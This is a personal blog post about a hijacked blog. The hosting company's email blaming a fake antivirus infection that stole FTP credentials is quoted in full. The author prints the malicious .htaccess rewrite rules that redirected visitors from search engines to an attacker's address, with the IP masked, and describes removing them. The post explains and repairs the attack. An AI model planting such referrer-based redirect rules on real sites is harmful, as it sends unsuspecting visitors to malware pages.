Yesterday my brother called me up to let me know that when clicking a link in Google Reader to get to this blog, a malicious website appears instead of the blog. I tried it myself and he was right. The strange thing was that if you tried to enter the address yourself it worked but only if you clicked a link inside Google Reader you would get to the malicious website.
I tried looking for what could have gone wrong. As I couldn’t find anything, I assumed maybe some kind of DNS poisoning occurred, that the solution is out of my reach and that if I wait it out a little bit everything will be back to normal.
So today I checked again and the problem still persisted. I decided to look further into things. Remembering an email message I got from my host, IX Web Hosting, I looked it up. Here it is:
Dear Amit,
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-20092. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our systemWe are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
http://www.ixwebhosting.com
When I first got this message I thought it was a hoax. Considering that the computers I use to access my website all have Linux installed, “blaming” me for having the infamous Anti-Virus 2009 (which is a relatively new and very aggressive virus) on my computers is simply wrong, being impossible and all. So I ignored the message but still kept it (I thought about contacting IX Web Hosting to ask whether this was real but just forgot about it.)
Reading the message from IX Web Hosting again, though, got me to check my .htaccess file. And indeed the file contained the following lines:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://10.0.0.1/join.html?s=join [R,L]
These lines mean that if you get to this website from any of the well-known search engines you will be redirected to the address at the last line (I changed the IP address intentionally.) Once I deleted the file from the website’s root directory everything was back to normal. Now I wanted to know how long my blog had been hijacked. My Google Analytics account revealed the answer: my search engines sources dropped to almost zero around December 14th (about a month ago.)
Digging further, I found this post on the IX Web Hosting Warning blog. The writer of the post seems to think, like me, that IX Web Hosting are simply trying to shift the blame to the customers, which is a big shame.
Up until today I was generally happy with IX Web Hosting. I almost never had any problems with the website and whenever I needed support they answered quickly and resolved any issues I had. But reading through the IX Web Hosting Warning blog made me want to switch hosts (again.) I guess I’ll do that when I’m back from my trip and hope for the best until then. I just can’t be bothered right now with switching hosts.